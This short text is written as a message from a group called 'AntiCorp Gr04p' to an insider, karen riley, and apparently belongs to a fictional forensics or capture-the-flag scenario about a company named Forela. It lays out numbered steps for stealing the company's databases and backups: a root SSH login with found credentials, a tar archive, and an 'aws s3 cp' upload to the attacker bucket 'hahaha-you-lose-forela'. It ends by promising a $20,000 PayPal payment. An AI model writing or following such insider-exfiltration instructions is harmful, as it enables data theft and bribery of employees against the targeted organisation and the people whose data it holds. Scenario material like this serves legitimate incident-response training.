

Constellation

Thanks For getting in touch with AntiCorp Gr04p, karen riley. We appreciate you in helping us get our hands on important data for forela. Its high time we stand against billion dollars corporates who are playing monopoly with common folks!! We are attaching instructions on how to get us the data securely.

Follow these in same order.

1. Connect to the server: Using the ssh credentials you were able to find, logon to the server. Run this command : `ssh root@server-IP` . Enter password when prompted
- 2.
3. Once connected to the server, archive the folders containing databases and backups. To create a tar archive of a directory, use the following command:

```
tar -czvf archive.tar.gz /path/to/directory
```

This command will create a compressed tar archive of the folder.

4. After creating the archive, you can use the AWS Command Line Interface (CLI) to transfer the file to the S3 bucket. If you don't have the AWS CLI installed, you can follow the instructions here: <https://aws.amazon.com/cli/>
5. Configure AWS CLI: Once the AWS CLI is installed, you need to configure it with your AWS credentials. Open a terminal and run the following command:

```
aws configure
```

It will prompt you to enter your AWS Access Key ID, Secret Access Key, default region, and default output format. Provide the required information based on your AWS account as provided by our agent to you.

6. With the AWS CLI configured, you can now upload the archive to the S3 bucket. Use the following command:

```
aws s3 cp /path/to/archive.tar.gz s3://hahaha-you-lose-forela/
```

Replace `/path/to/archive.tar.gz` with the actual path to your archive file. The `s3://hahaha-you-lose-forela/` represents the S3 bucket name and destination path.

7. After executing the command, the archive file will be uploaded to the specified S3 bucket. You can verify the upload by checking the AWS S3 console or by running the following command:

```
aws s3 ls s3://hahaha-you-lose-forela/
```

This command will list the contents of the specified S3 bucket.

As promised \$20000 dollars will be sent to you via paypal account.